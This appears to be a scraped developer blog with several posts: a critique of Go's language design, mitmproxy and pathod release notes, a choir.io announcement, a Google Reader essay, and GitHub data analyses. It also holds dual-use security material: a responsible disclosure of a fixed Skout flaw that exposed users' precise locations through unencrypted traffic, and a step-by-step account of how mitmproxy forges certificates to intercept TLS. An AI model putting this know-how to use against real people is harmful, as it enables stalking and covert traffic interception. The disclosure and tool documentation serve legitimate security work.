Range expression</th>	1st Value</th>	2nd Value</th> </tr>
array or slice</td>	index i</td>	a[i]</td> </tr>
map</td>	key k</td>	m[k]</td> </tr>
string</td>	index i of rune</td>	rune int</td> </tr>
channel</td>	element</td>	error</td> </tr> </table> What range does for arrays and maps seems consistent and not particularly surprising. Things get a tad slightly odd with channels. A second variable arguably doesn't make much sense when ranging over a channel, so trying to do this results in a compile time error. Not terribly consistent, but logical.</p> Weirder still is range</strong> over strings. When operating on a string, range returns runes</a> (Unicode code points) not bytes. So, this code:</p> `s </span>:= "</span>a</span>\u00fc</span>b</span>" </span>for </span>a</span>, </span>b </span>:= </span>range </span>s </span>{ </span>fmt</span>.</span>Println</span>(</span>a</span>, </span>b</span>) } </span></code></pre> Prints this:</p>` `0 97 1 252 3 98 </span></code></pre> Notice the jump from 1 to 3 in the array index, because the rune at offset 1 is two bites wide in UTF-8. And look what happens when we now retrieve the value at that offset from the array. This:</p>` `fmt</span>.</span>Println</span>(</span>s</span>[</span>1</span>]) </span></code></pre> Prints this:</p>` 195 </span></code></pre> What gives? At first glance, it's reasonable to expect this to print 252, as returned by range</strong>. That's wrong, though, because string access by index operates on bytes, so what we're given is the first byte of the UTF-8 encoding of the rune. This is bound to cause subtle bugs. Code that works perfectly on ASCII text simply due to the fact that UTF-8 encodes these in a single byte will fail mysteriously as soon as non-ASCII characters appear.</p> My argument here is that range</strong> is a very clear example of design directly from concrete use cases down, with little concern for consistency. In fact, the table of range</strong> return values above is really just a compendium of use cases: at each point the result is simply the one that is most directly useful. So, it makes total sense that ranging over strings returns runes. In fact, doing anything else would arguably be incorrect. What's characteristic here is that no attempt was made to reconcile this interface with the core of the language. It serves the use case well, but feels jarring.</p> Arrays are values, maps are references</h2> One final example along these lines. A core irregularity at the heart of Go is that arrays are values, while maps are references. So, this code will modify the s</strong> variable:</p> `func </span>mod</span>(</span>x </span>map</span>[</span>int</span>] </span>int</span>){ </span>x</span>[</span>0</span>] = </span>2 </span>} </span>func </span>main</span>() { </span>s </span>:= </span>map</span>[</span>int</span>]</span>int</span>{} </span>mod</span>(</span>s</span>) </span>fmt</span>.</span>Println</span>(</span>s</span>) } </span></code></pre> And print:</p>` `map[0:2] </span></code></pre> While this code won't:</p>`func </span>mod</span>(</span>x </span>[</span>1</span>]</span>int</span>){ </span>x</span>[</span>0</span>] = </span>2 </span>} </span>func </span>main</span>() { </span>s </span>:= [</span>1</span>]</span>int</span>{} </span>mod</span>(</span>s</span>) </span>fmt</span>.</span>Println</span>(</span>s</span>) } </span></code></pre> And will print:</p> [0] </span></code></pre> This is undoubtedly inconsistent, but it turns out not to be an issue in practice, mostly because slices are</em> references, and are passed around much more frequently than arrays. This issue has surprised enough people to make it into the Go FAQ, where the justification is as follows</a>:</p> There's a lot of history on that topic. Early on, maps and channels were syntactically pointers and it was impossible to declare or use a non-pointer instance. Also, we struggled with how arrays should work. Eventually we decided that the strict separation of pointers and values made the language harder to use. This change added some regrettable complexity to the language but had a large effect on usability: Go became a more productive, comfortable language when it was introduced.</p> </blockquote> This is not exactly the clearest explanation for a technical decision I've ever read, so allow me to paraphrase: "Things evolved this way for pragmatic reasons, and consistency was never important enough to force a reconciliation".</p> The G Word</h2> Now we get to that perpetual bugbear of Go critiques: the lack of generics. This, I think, is the deepest example of the Go designers' willingness to sacrifice coherence for pragmatism. One gets the feeling that the Go devs are a tad weary of this argument by now, but the issue is substantive and worth facing squarely. The crux of the matter is this: Go's built-in container types are super special. They can be parameterized with the type of their contained values in a way that user-written data structures can't be.</p> The supported way to do generic data structures is to use blank interfaces. Lets look at an example of how this works in practice. First, here is a simple use of the built-in array type.</p> l </span>:= </span>make</span>([]</span>string</span>, </span>1</span>) </span>l</span>[</span>0</span>] = "</span>foo</span>" </span>str </span>:= </span>l</span>[</span>0</span>] </span></code></pre> In the first line we initialize the array with the type string</strong>. We then insert a value, and in the final line, we retrieve it. At this point, str</strong> has type string</strong> and is ready to use. The user-written analogue of this might be a modest data structure with put</strong> and get</strong> methods. We can define this using interfaces like so:</p> type </span>gtype </span>struct </span>{ </span>data </span>interface</span>{} } </span>func </span>(</span>t </span></span>gtype</span>) </span>put</span>(</span>v </span>interface</span>{}) { </span>t</span>.</span>data </span>= </span>v </span>} </span>func </span>(</span>t </span></span>gtype</span>) </span>get</span>() </span>interface</span>{} { </span>return </span>t</span>.</span>data </span>} </span></code></pre> To use this structure, we would say:</p> v </span>:= </span>gtype</span>{} </span>v</span>.</span>put</span>("</span>foo</span>") </span>str </span>:= </span>v</span>.</span>get</span>().(</span>string</span>) </span></code></pre> We can assign a string to a variable with the empty interface type without doing anything special, so put</strong> is simple. However, we need to use a type assertion on the way out, otherwise the str</strong> variable will have type interface{}</strong>, which is probably not what we want.</p> There are a number of issues here. It's cosmetically bothersome that we have to place the burden of type assertion on the caller of our data structure, making the interface just a little bit less nice to use. But the problems extend beyond syntactic inconvenience - there's a substantive difference between these two ways of doing things. Trying to insert a value of the wrong type into the built-in array causes a compile-time error, but the type assertion acts at run-time and causes a panic on failure. The blank-interface paradigm sidesteps Go's compile time type checking, negating any benefit we may have received from it.</p> The biggest issue for me, though, is the conceptual inconsistency. This is something that's difficult to put into words, so here's a picture:</p> </a> </div> The fact that the built-in containers magically do useful things that user-written code can't irks me. It hasn't become less jarring over time, and still feels like a bit of grit in my eye that I can't get rid of. I might be an extreme case, but this is an aesthetic instinct that I think is shared by many programmers, and would have convinced many language designers to approach the problem differently.</p> The extent to which Go's lack of generics is a critical problem, however, is not the point here. The meat of the matter is why</strong> this design decision was taken, and what it reveals about the character of Go. Here's how the lack of generics is justified by the Go developers</a>:</p> Many proposals for generics-like features have been mooted both publicly and internally, but as yet we haven't found a proposal that is consistent with the rest of the language. We think that one of Go's key strengths is its simplicity, so we are wary of introducing new features that might make the language more difficult to understand.</p> </blockquote> Instead of creating the atomic elements needed to support generic data structures then adding a suite of them to the standard library, the Go team went the other way. There was a concrete use case for good data structures, and so they were added. Attempting a deep reconciliation with the rest of the language was a secondary requirement that was so unimportant that it fell by the wayside for Go 1.x.</p> A Pragmatic Beauty</h1> Lets over-simplify for a moment and divide languages into two extreme camps. On the one hand, you have languages that are highly consistent, with most higher order functionality deriving from the atomic elements of the language. In this camp, we can find languages like Lisp. On the other hand are languages that are shamelessly eager to please. They tend to grow organically, sprouting syntax as needed to solve specific pragmatic problems. As a consequence, they tend to be large, syntactically diverse, not terribly coherent, and, occasionally, sometimes even unparseable</a>. In this camp, we find languages like Perl. It's tempting to think that there exists a language somewhere in the infinite multiverse of possibilities that unites perfect consistency and perfect usability, but if there is, we haven't found it. The reality is that all languages are a compromise, and that balancing these two forces against each other is really what makes language design so hard. Placing too much value on consistency constrains the human concessions we can make for mundane use cases. Making too many concessions results in a language that lacks coherence.</p> Like many programmers, I instinctively prefer purity and consistency and distrust "magic". In fact, I've never found a language with a strongly pragmatic bent that I really liked. Until now, that is. Because there's one thing I'm pretty clear on: Go is on the Perl end of this language design spectrum. It's designed firmly from concrete use cases down, and shows its willingness to sacrifice consistency for practicality again and again. The effects of this design philosophy permeate the language. This, then, is the source of my initial dissatisfaction with Go: I'm pre-disposed to dislike many of its core design decisions.</p> Why, then, has the language grown on me over time? Well, I've gradually become convinced that practically-motivated flaws like the ones I list in this post add up to create Go's unexpected nimbleness. There's a weird sort of alchemy going on here, because I think any one of these decisions in isolation makes Go a worse language (even if only slightly). Together, however, they jolt Go out of a local maximum many procedural languages are stuck in, and take it somewhere better. Look again at each of the cases above, and imagine what the cumulative effect on Go would have been if the consistent choice had been made each time. The language would have more syntax, more core concepts to deal with, and be more verbose to write. Once you reason through the repercussions, you find that the result would have been a worse language overall. It's clear that Go is not the way it is because its designers didn't know better, or didn't care. Go is the result of a conscious pragmatism that is deep and audacious. Starting with this philosophy, but still managing to keep the language small and taut, with almost nothing dispensable or extraneous took great discipline and insight, and is a remarkable achievement.</p> So, despite its flaws, Go remains graceful. It just took me a while to appreciate it, because I expected the grace of a ballet dancer, but found the grace of an battered but experienced bar-room brawler.</p> --</p> Edited to remove some inaccuracies about channels.</p> ^3</sup>Simplified from here</a>.</p> </div> ^{2</sup> I don't mean mundane details like the syntax and core concepts of a language. In the case of Go, you can get a handle on these in an hour by reading the language specification.</p> </div>}^{1</sup> Pedant hedge: yes, the illusion isn't perfect, and there are in fact subtle ways in which Python dictionaries are not just objects like any other.</p> </div>} mitmproxy and pathod 0.9.2 2013-08-25T00:00:00+00:00 </a> </div> I've just released v0.9.2 of both mitmproxy</a> and pathod</a>. This is a bugfix release, chiefly to address two crashing issues affecting mitmproxy when relaying SSL traffic. A range of other fixes and improvements are also included - if you use mitmproxy, you should upgrade.</p> CHANGELOG</h2> Improvements to the mitmproxywrapper.py helper script for OSX.</li> Don't take minor version into account when checking for serialized file compatibility.</li> Fix a bug causing resource exhaustion under some circumstances for SSL connections.</li> Revamp the way we store interception certificates. We used to store these on disk, they're now in-memory. This fixes a race condition related to cert handling, and improves compatibility with Windows, where the rules governing permitted file names are weird, resulting in errors for some valid IDNA-encoded names.</li> Display transfer rates for responses in the flow list.</li> Many other small bugfixes and improvements.</li> </ul> Introducing choir.io 2013-08-16T00:00:00+00:00 </a> choir.io </div> </div> Today, I'm raising the veil (slightly) on a new project - choir.io</a>. The most succinct description of choir.io is that it is a service that turns events into sound. Why would you want to do that? Well, I believe that there are compelling reasons to make sound part of your monitoring stack. Let's see if I can convince you.</p> The soundscape</h2> When I walk into my study every morning, I'm surrounded a rich, subtle soundscape that exists just beneath conscious perception. My air-conditioner, computers and monitors all emit hums and purrs. I can "tune in" to these if I focus, but they usually only draw my attention when something changes. When the power goes out there is a deathly silence, when a CPU fan noise changes pitch or texture, it bothers me immediately.</p> Layered over this background are more obtrusive sounds, closer to the threshold of awareness - the clacking of keyboards, faint noises of my family getting ready for their day upstairs, the front door opening and closing. Whether or not I pay attention to these is somewhat context dependent. Am I waiting, or instance, for my wife and kids to start trooping down the stairs so I can join them for my son's swimming lesson? If I am, I listen out for those sounds specifically. I get an enormous amount of information about my world from these more discrete, event-related noises.</p> Finally, there are the really obtrusive sounds, things that immediately get my attention. This might be someone saying my name, my phone ringing, a knock at the door, or a smoke alarm. I'm very aware of these, and they usually signal something I have to deal with immediately.</p> These layers of more and less obtrusive sounds form a soundscape that is ever-present, and utterly necessary in our day-to-day lives. Notice how effortless this process of extracting meaning from our ambient sounds is. Our minds process this information stream without any mental exertion, filters out what we don't need to notice, and draws our attention to what we do. There's a lot of cognitive research (that I might delve into in future posts) that show that our brains and auditory systems are specifically designed to make sense of the world in this way.</p> We have nothing like this rich texture of ambient awareness for the technology that surrounds us. Our monitoring mechanisms seem to be stuck at the ends of the intrusiveness spectrum. At one end, we have email notifications that demand our attention until we start to ignore them or silence them with a filter. At the other end we have passive status dashboards that require us to remember to switch context and visually consult a different interface. Choir.io doesn't aim to supplant either of these, but tries to fill in the blank portion of the awareness spectrum between them.</p> When I sit at my desk, I can hear our server architecture humming away. There's the subtle pitter-patter of hits to various webservers, the occasional clack of an SSH login. Occasionally there is a chime when @alexdong pushes to Github, followed shortly by the celebratory cheer of a server deploy. When I hear the jarring note of a 500 server error, I switch context to view logs or a dashboard, but otherwise my focus stays with my editor window. Choir is young, but it's already become an indispensable part of my life.</p> Challenges and next steps</h2> There are a number of key questions that we'd like to answer with the help of our intrepid early adopters. First among these is the question of soundscape design. What makes a good sound pack? What is the right mix of intrusive and non-intrusive sounds? How do we construct soundscapes that blend into the background like natural sounds do? Another set of questions surrounds the API and integration. What is the right blend of simplicity and power is in the API? Which services should we integrate with next?</p> There are some obvious next steps in the works. We recognize that sound pack design is a deep problem with subjective solutions. So, letting users assemble, edit and eventually share their own sound packs is high on our list of priorities. Free-standing Choir.io player apps for Windows and OSX will also be on the way soon, so you won't need to remember to keep a browser tab open. Technical improvements to the API that are on the way include UDP and SSL support.</p> Choir is trying to do something new, and we want as much feedback as early in the process as possible. So, we've decided to start sending out invites today, even though Choir is far from the polished system that it will be in a few months. If you're brave, willing to give frank feedback, and want to help us explore this exciting idea, please request an invite</a>.</p> mitmproxy 0.9.1 2013-06-16T00:00:00+00:00 </a> </div> I'm happy to announce the release of mitmproxy 0.9.1</a>. This is a bugfix release, with no significant changes in behaviour.</p> As hinted in my previous release note, the project itself is also evolving. As of this release, mitmproxy and its sister projects (pathod</a> and netlib</a>) are housed under a separate organization on Github, rather than my own personal space:</p> github.com/mitmproxy</a></p> I'm also very happy to welcome the first external core developer to the mitmproxy projext: Maximilian Hils</a>. Max is the author of HoneyProxy</a>, a web analysis front-end for mitmproxy. In the next few months, he'll be working on integrating and expanding his work to become mitmproxy's official web interface. Max's efforts will be sponsored by Google under their Summer of Code</a> program, and will be mentored by the HoneyNet Project</a>.</p> Changelog</h2> Use "correct" case for Content-Type headers added by mitmproxy.</li> Make UTF environment detection more robust.</li> Improved MIME-type detection for viewers.</li> Always read files in binary mode (Windows compatibility fix).</li> Correct PyOpenSSL dependency declaration.</li> Some developer documentation.</li> </ul> Skout: a devastating privacy vulnerability 2013-05-31T00:00:00+00:00 I've become a bit weary of the process of public vulnerability disclosure - I'm much more likely nowadays to just drop companies an anonymous notice and move on. Every so often, though, I come across an issue so egregious that talking about it publicly seems like an imperative. This is one of them.</p> First, some background. Skout is a location-based mobile social network. The idea is to allow people to meet others in their area, semi-anonymously, get to know them, and then perhaps line up a meeting in meatspace. As far as I can tell, a huge fraction of the userbase are singles, using Skout as an ad-hoc dating app. Skout's scale is significant - they don't release exact user numbers, but I've seen claims of more than 10 million users, and a growth rate of a million users per month.</p> In 2012, Skout went through a major PR catastrophe, when its service was linked to no fewer than 3 separate rapes of children</a> by adult men posing as teenagers. Skout immediately suspended the service for teenagers and went through a security re-vamp. A month later, teens were allowed back</a>, with Skout making much of its new safety system, "advanced, proprietary algorithms" to weed out stalkers, and its long-term commitment to community safety.</p> Given this background, the problem I found is simple but devastating. The Skout mobile application talks to Skout's servers through a simple API. When a user's profile is viewed an unencrypted, plain-HTTP request is made to to a path like this:</p> http://i22.skout.com/services/ServerService/getProfile </code></pre> What's returned is a blob of XML containing the user's complete profile data. In fact, the profile data is too</em> complete, including some bits of data information that is never actually used by the app. For example, we can see the user's exact date of birth:</p> <</span>ax213:birthdayDate</span>>xx/xx/1995</</span>ax213:birthdayDate</span>> </span></code></pre> ... but only the user's age in years is actually displayed. Most serious, however, is the high-precision location information that is returned in the ax213:homeLocation and ax213:location tags:</p> <</span>ax213:latitude</span>>-xx.xxx</</span>ax213:latitude</span>> <</span>ax213:longitude</span>>xxx.xxx</</span>ax213:longitude</span>> </span></code></pre> The three decimal places of precision in the co-ordinates is enough to locate a user to within about 110 meters north-south, and substantially less than that east-west depending on the distance from the equator. Here's what that looks like in a hypothetical example:</p> </a> </div> I used mitmproxy</a> to observe Skout's traffic, but because the request is unencrypted any tool that allows you to inspect network traffic would be enough. The result is a stalker's wet dream - click on an anonymous profile, watch your network traffic, and find out exactly where the victim lives. I've also seen minors located at malls where they hang out, and at their schools... Given the scale of Skout's userbase and the ease with which the data can be obtained, I think there's a high likelihood that this issue has already been used for unsavoury purposes.</p> I reported the vulnerability to Skout on the 24th of May. I'm happy to report that they immediately realised the seriousness of the situation, and their API stopped returning exact lat/long values a few hours later. Subsequent correspondence with Niklas Lindstrom, Skout's CTO, confirmed that they were taking steps to tighten security. I've encouraged Skout to speak about this publicly - their userbase needs to know about the issue, and need to be reassured that action is being taken to ensure that this type of privacy breach won't ever recur.</p> How mitmproxy works 2013-05-16T00:00:00+00:00 I started work on mitmproxy</a> because I was frustrated with the available interception tools. I had a long list of minor complaints - they were insufficiently flexible, not programmable enough, mostly written in Java (a language I don't enjoy), and so forth. My most serious problem, though, was opacity. The best tools were all closed source and commercial. SSL interception is a complicated and delicate process, and after a certain point, not understanding precisely what your proxy is doing just doesn't fly.</p> The text below is now part of the official documentation</a> of mitmproxy. It's a detailed description of mitmproxy's interception process, and is more or less the overview document I wish I had when I first started the project. I proceed by example, starting with the simplest unencrypted explicit proxying, and working up to the most complicated interaction - transparent proxying of SSL-protected traffic1</a></sup> in the presence of SNI</a>.</p> Explicit HTTP</h2> Configuring the client to use mitmproxy as an explicit proxy is the simplest and most reliable way to intercept traffic. The proxy protocol is codified in the HTTP RFC</a>, so the behaviour of both the client and the server is well defined, and usually reliable. In the simplest possible interaction with mitmproxy, a client connects directly to the proxy and makes a request that looks like this:</p> GET http://example.com/index.html HTTP/1.1 </span></code></pre> This is a proxy GET request - an extended form of the vanilla HTTP GET request that includes a schema and host specification, and it includes all the information mitmproxy needs to relay the request upstream.</p> </a> </div> 1</b></td> The client connects to the proxy and makes a request.</td> </tr> 2</b></td> Mitmproxy connects to the upstream server and simply forwards the request on.</td> </tr> </tbody> </table> Explicit HTTPS</h2> The process for an explicitly proxied HTTPS connection is quite different. The client connects to the proxy and makes a request that looks like this:</p> CONNECT example.com:443 HTTP/1.1 </span></code></pre> A conventional proxy can neither view nor manipulate an SSL-encrypted data stream, so a CONNECT request simply asks the proxy to open a pipe between the client and server. The proxy here is just a facilitator - it blindly forwards data in both directions without knowing anything about the contents. The negotiation of the SSL connection happens over this pipe, and the subsequent flow of requests and responses are completely opaque to the proxy.</p> The MITM in mitmproxy</h3> This is where mitmproxy's fundamental trick comes into play. The MITM in its name stands for Man-In-The-Middle - a reference to the process we use to intercept and interfere with these theoretically opaque data streams. The basic idea is to pretend to be the server to the client, and pretend to be the client to the server, while we sit in the middle decoding traffic from both sides. The tricky part is that the Certificate Authority</a> system is designed to prevent exactly this attack, by allowing a trusted third-party to cryptographically sign a server's SSL certificates to verify that they are legit. If this signature doesn't match or is from a non-trusted party, a secure client will simply drop the connection and refuse to proceed. Despite the many shortcomings of the CA system as it exists today, this is usually fatal to attempts to MITM an SSL connection for analysis. Our answer to this conundrum is to become a trusted Certificate Authority ourselves. Mitmproxy includes a full CA implementation that generates interception certificates on the fly. To get the client to trust these certificates, we register mitmproxy as a trusted CA with the device manually</a>.</p> Complication 1: What's the remote hostname?</h3> To proceed with this plan, we need to know the domain name to use in the interception certificate - the client will verify that the certificate is for the domain it's connecting to, and abort if this is not the case. At first blush, it seems that the CONNECT request above gives us all we need - in this example, both of these values are "example.com". But what if the client had initiated the connection as follows:</p> CONNECT 10.1.1.1:443 HTTP/1.1 </span></code></pre> Using the IP address is perfectly legitimate because it gives us enough information to initiate the pipe, even though it doesn't reveal the remote hostname.</p> Mitmproxy has a cunning mechanism that smooths this over - upstream certificate sniffing</a>. As soon as we see the CONNECT request, we pause the client part of the conversation, and initiate a simultaneous connection to the server. We complete the SSL handshake with the server, and inspect the certificates it used. Now, we use the Common Name in the upstream SSL certificates to generate the dummy certificate for the client. Voila, we have the correct hostname to present to the client, even if it was never specified.</p> Complication 2: Subject Alternative Name</h3> Enter the next complication. Sometimes, the certificate Common Name is not, in fact, the hostname that the client is connecting to. This is because of the optional Subject Alternative Name</a> field in the SSL certificate that allows an arbitrary number of alternative domains to be specified. If the expected domain matches any of these, the client will proceed, even though the domain doesn't match the certificate Common Name. The answer here is simple: when extract the CN from the upstream cert, we also extract the SANs, and add them to the generated dummy certificate.</p> Complication 3: Server Name Indication</h3> One of the big limitations of vanilla SSL is that each certificate requires its own IP address. This means that you couldn't do virtual hosting where multiple domains with independent certificates share the same IP address. In a world with a rapidly shrinking IPv4 address pool this is a problem, and we have a solution in the form of the Server Name Indication</a> extension to the SSL and TLS protocols. This lets the client specify the remote server name at the start of the SSL handshake, which then lets the server select the right certificate to complete the process.</p> SNI breaks our upstream certificate sniffing process, because when we connect without using SNI, we get served a default certificate that may have nothing to do with the certificate expected by the client. The solution is another tricky complication to the client connection process. After the client connects, we allow the SSL handshake to continue until just after</em> the SNI value has been passed to us. Now we can pause the conversation, and initiate an upstream connection using the correct SNI value, which then serves us the correct upstream certificate, from which we can extract the expected CN and SANs.</p> There's another wrinkle here. Due to a limitation of the SSL library mitmproxy uses, we can't detect that a connection hasn't</em> sent an SNI request until it's too late for upstream certificate sniffing. In practice, we therefore make a vanilla SSL connection upstream to sniff non-SNI certificates, and then discard the connection if the client sends an SNI notification. If you're watching your traffic with a packet sniffer, you'll see two connections to the server when an SNI request is made, the first of which is immediately closed after the SSL handshake. Luckily, this is almost never an issue in practice.</p> Putting it all together</h3> Lets put all of this together into the complete explicitly proxied HTTPS flow.</p> </a> </div> 1</b></td> The client makes a connection to mitmproxy, and issues an HTTP CONNECT request.</td> </tr> 2</b></td> Mitmproxy responds with a 200 Connection Established, as if it has set up the CONNECT pipe.</td> </tr> 3</b></td> The client believes it's talking to the remote server, and initiates the SSL connection. It uses SNI to indicate the hostname it is connecting to.</td> </tr> 4</b></td> Mitmproxy connects to the server, and establishes an SSL connection using the SNI hostname indicated by the client.</td> </tr> 5</b></td> The server responds with the matching SSL certificate, which contains the CN and SAN values needed to generate the interception certificate.</td> </tr> 6</b></td> Mitmproxy generates the interception cert, and continues the client SSL handshake paused in step 3.</td> </tr> 7</b></td> The client sends the request over the established SSL connection.</td> </tr> 7</b></td> Mitmproxy passes the request on to the server over the SSL connection initiated in step 4.</td> </tr> </tbody> </table> Transparent HTTP</h2> When a transparent proxy is used, the HTTP/S connection is redirected into a proxy at the network layer, without any client configuration being required. This makes transparent proxying ideal for those situations where you can't change client behaviour - proxy-oblivious Android applications being a common example.</p> To achieve this, we need to introduce two extra components. The first is a redirection mechanism that transparently reroutes a TCP connection destined for a server on the Internet to a listening proxy server. This usually takes the form of a firewall on the same host as the proxy server - iptables</a> on Linux or pf</a> on OSX. Once the client has initiated the connection, it makes a vanilla HTTP request, which might look something like this:</p> GET /index.html HTTP/1.1 </span></code></pre> Note that this request differs from the explicit proxy variation, in that it omits the scheme and hostname. How, then, do we know which upstream host to forward the request to? The routing mechanism that has performed the redirection keeps track of the original destination for us. Each routing mechanism has a different way of exposing this data, so this introduces the second component required for working transparent proxying: a host module that knows how to retrieve the original destination address from the router. In mitmproxy, this takes the form of a built-in set of modules</a> that know how to talk to each platform's redirection mechanism. Once we have this information, the process is fairly straight-forward.</p> </a> </div> 1</b></td> The client makes a connection to the server.</td> </tr> 2</b></td> The router redirects the connection to mitmproxy, which is typically listening on a local port of the same host. Mitmproxy then consults the routing mechanism to establish what the original destination was.</td> </tr> 3</b></td> Now, we simply read the client's request...</td> </tr> 4</b></td> ... and forward it upstream.</td> </tr> </tbody> </table> Transparent HTTPS</h2> The first step is to determine whether we should treat an incoming connection as HTTPS. The mechanism for doing this is simple - we use the routing mechanism to find out what the original destination port is. By default, we treat all traffic destined for ports 443 and 8443 as SSL.</p> From here, the process is a merger of the methods we've described for transparently proxying HTTP, and explicitly proxying HTTPS. We use the routing mechanism to establish the upstream server address, and then proceed as for explicit HTTPS connections to establish the CN and SANs, and cope with SNI.</p> </a> </div> 1</b></td> The client makes a connection to the server.</td> </tr> 2</b></td> The router redirects the connection to mitmproxy, which is typically listening on a local port of the same host. Mitmproxy then consults the routing mechanism to establish what the original destination was.</td> </tr> 3</b></td> The client believes it's talking to the remote server, and initiates the SSL connection. It uses SNI to indicate the hostname it is connecting to.</td> </tr> 4</b></td> Mitmproxy connects to the server, and establishes an SSL connection using the SNI hostname indicated by the client.</td> </tr> 5</b></td> The server responds with the matching SSL certificate, which contains the CN and SAN values needed to generate the interception certificate.</td> </tr> 6</b></td> Mitmproxy generates the interception cert, and continues the client SSL handshake paused in step 3.</td> </tr> 7</b></td> The client sends the request over the established SSL connection.</td> </tr> 7</b></td> Mitmproxy passes the request on to the server over the SSL connection initiated in step 4.</td> </tr> </tbody> </table> ^{1</sup> I use "SSL" to refer to both SSL and TLS in the generic sense, unless otherwise specified.</p> </div> pathod 0.9 2013-05-16T00:00:00+00:00 I've just released pathod 0.9</a>, my toolset for crafting malicious and interesting HTTP traffic. Apart from the usual range of stability improvements and bugfixes, this release introduces a major new set of features: proxy support. Pathoc</a>, the client, has sprouted support for vanilla proxy connections, and is also able to tunnel through proxies using CONNECT. Pathod</a>, the server, will now respond to proxy requests as well as straight HTTP, and will treat CONNECT requests as SSL with on-the-fly generation of dummy certificates.</p> The Pathod changes in particular open a whole new range of possibilities for fuzzing and other mischief. Any client with proxy support can be directed at Pathod, which can then impersonate the upstream server and return the creatively malicious response of your choice.</p> There have also been some organizational changes. This is the first release based on netlib</a>, the gonzo networking library pathod now shares with mitmproxy</a>. Over the next while, pathod and mitmproxy will move closer together. As a sign of this, the major version numbers between these projects are now synchronized.</p> mitmproxy 0.9 2013-05-15T00:00:00+00:00 </a> </div> I'm happy to announce the release of mitmproxy 0.9</a>. This is a major release, with huge improvements to mitmproxy pretty much across the board. So much has happened in the year since the last release that it's difficult to pick out the headlines. Mitmproxy is now faster, more scalable, and works in more tricky corner cases than ever before. Full transparent mode support has landed for both Linux and OSX. Content decoding is much nicer, with a slew of new targets like AMF</a> and Protocol Buffers</a>. We now have a WSGI container that allows you to host web apps right in the proxy. In addition to this, there is a myriad of new features, bugfixes and other small improvements.</p> There are also changes afoot in the project itself. As a first step, I've moved mitmproxy from the GPLv3 to an MIT license. I hope that this will make it easier for people to use the project in more contexts. Keep an eye out for more changes along these lines soon, geared to broadening participation in the project.</p> Changelog</h2> Upstream certs mode is now the default.</li> Add a WSGI container that lets you host in-proxy web applications.</li> Full transparent proxy support for Linux and OSX.</li> Introduce netlib, a common codebase for mitmproxy and pathod</a>.</li> Full support for SNI.</li> Color palettes for mitmproxy, tailored for light and dark terminal backgrounds.</li> Stream flows to file as responses arrive with the "W" shortcut in mitmproxy.</li> Extend the filter language, including ~d domain match operator, ~a to match asset flows (js, images, css).</li> Follow mode in mitmproxy ("F" shortcut) to "tail" flows as they arrive.</li> --dummy-certs option to specify and preserve the dummy certificate directory.</li> Server replay from the current captured buffer.</li> Huge improvements in content views. We now have viewers for AMF, HTML, JSON, Javascript, images, XML, URL-encoded forms, as well as hexadecimal and raw views.</li> Add Set Headers, analogous to replacement hooks. Defines headers that are set on flows, based on a matching pattern.</li> A graphical editor for path components in mitmproxy.</li> A small set of standard user-agent strings, which can be used easily in the header editor.</li> Proxy authentication to limit access to mitmproxy</li> </ul> Google, destroyer of ecosystems 2013-03-14T00:00:00+00:00 Google has finally shut down a service I actually care about - Google Reader will die a graceless, undignified death on July 1, 2013</a>. The only way Google could inconvenience me more would be to shut down search itself, and yet - I'm not angry that Google is shutting Reader down. I'm furious that they ever entered the RSS game at all. Consider this quote from a TechCrunch article in January 2006</a>. Here, Michael Arrington ends an article about the shutdown of a feed reader service with a statement that seems truly bizarre today:</p> The RSS reader space is becoming hyper competitive, with dozens of different choices for readers.</p> </blockquote> A hyper competitive space with dozens of choices? Reader made its first public appearance a couple of months before this, in October 2005. I remember this period well - it was a time of immense excitement, when RSS seemed to be the future, the news ecosystem was vibrant, and this thing called the blogosphere, fueled by peer subscription, was doubling in size every six months. It was into this magic garden that Google wandered, like a giant toddler leaving destruction in its wake. Reader was undeniably a good product, but it's best quality was also its worst: it was free. Subsidized by Google's immense search profits, it never had to earn its keep, and its competitors started to die. Over time, the "hyper competitive" RSS reader market turned into a monoculture. Today, on the eve of its shutdown, RSS more or less means "Google Reader" to a large fraction of readers, to the extent where even the best feed readers on IOS are just Google Reader clients1</a></sup>.</p> The sudden shock of Reader's closure will harm a news ecosystem that I already believe to be deeply ill</a>. Google Reader is not just a core part of my information diet - it's also the most direct channel I have to readers of this blog. As of today, the Reader subscriber count for corte.si</a> stands at about 3 times the total number of other subscribers combined. Some of these readers will migrate to other services and stay in touch, but many will inevitably abandon the idea of direct subscription to blogs entirely. In the next few months, tens of thousands of small blogs will lose direct contact with a large fraction of their readers.</p> The truth is this: Google destroyed the RSS feed reader ecosystem with a subsidized product, stifling its competitors and killing innovation. It then neglected Google Reader itself for years, after it had effectively become the only player. Today it does further damage by buggering up the already beleaguered links between publishers and readers. It would have been better for the Internet if Reader had never been at all.</p> ^1</sup>Yes, I'm aware that there are a few hardy outliers still playing in this place. My own logs show that their reach is insignificant, though, and when I tried to shift my subscriptions about a year ago, there was nothing as good as Reader itself. Once NewsBlur's</a> servers have recovered, I definitely plan to give it another shot.</p> </div> Things I found on GitHub: aspell custom dictionary entries 2013-02-26T00:00:00+00:00 I've been doing a series of posts looking at data gathered with ghrabber</a>, a simple tool I wrote that lets you grab files matching a search specification from GitHub. Last week, I looked at shell history</a> in the broad, and then specifically at pipe chains</a>. Today, I move on to something different - custom aspell</a> dictionaries. When aspell finds a word it doesn't recognize, the user is prompted to correct it, ignore it, or add it to a custom dictionary so that it will be recognized as correct in future. These words are written to the user's custom dictionary - a file named .aspell_en_pw</strong> that lives in the user's home directory. It turns out that 30 people have checked aspell dictionaries into GitHub, containing a total of 9501 custom words. The chart below shows the top 50 words, with the X-axis showing the percentage of files the word appeared in.</p> </a> </div> There were a few requests for the raw data behind the previous two posts, so this time round you can also download a CSV file</a> with the occurrence totals for each word in the dataset.</p> Things I found on GitHub: pipe chains 2013-02-22T00:00:00+00:00 Earlier this week I published ghrabber</a>, a simple tool that lets you grab files matching an arbitrary search specification from GitHub. I used ghrabber to retrieve all the bash_history and zsh_history files accidentally checked in to repos, and took a light look at the dataset with some simple graphs</a>. In total, I obtained 234 shell history files with 165k individual command entries. This is a very rare opportunity to "shoulder-surf", to actually see what people do</em> at the command prompt, and perhaps get some insights into how to improve things.</p> Along those lines, today's post looks at pipe chains - that is, compound commands that pipe the output of one command to another. The pipe operator lies at the core of the Unix command-line philosophy. The fact that we can easily compose complex operations is the reason why we are able to write small tools that "do one thing well" without losing generality. The shell history data on Github can give us some real data about what people do with composed commands, and how they do it.</p> </a> </div> It turns out that about 2% of all commands issued on the command-line use pipes. The graph above shows the prevalence the most common pipe chains - that is, what percentage of the user in my sample used each chain. There's a lot of fascinating stuff we can read 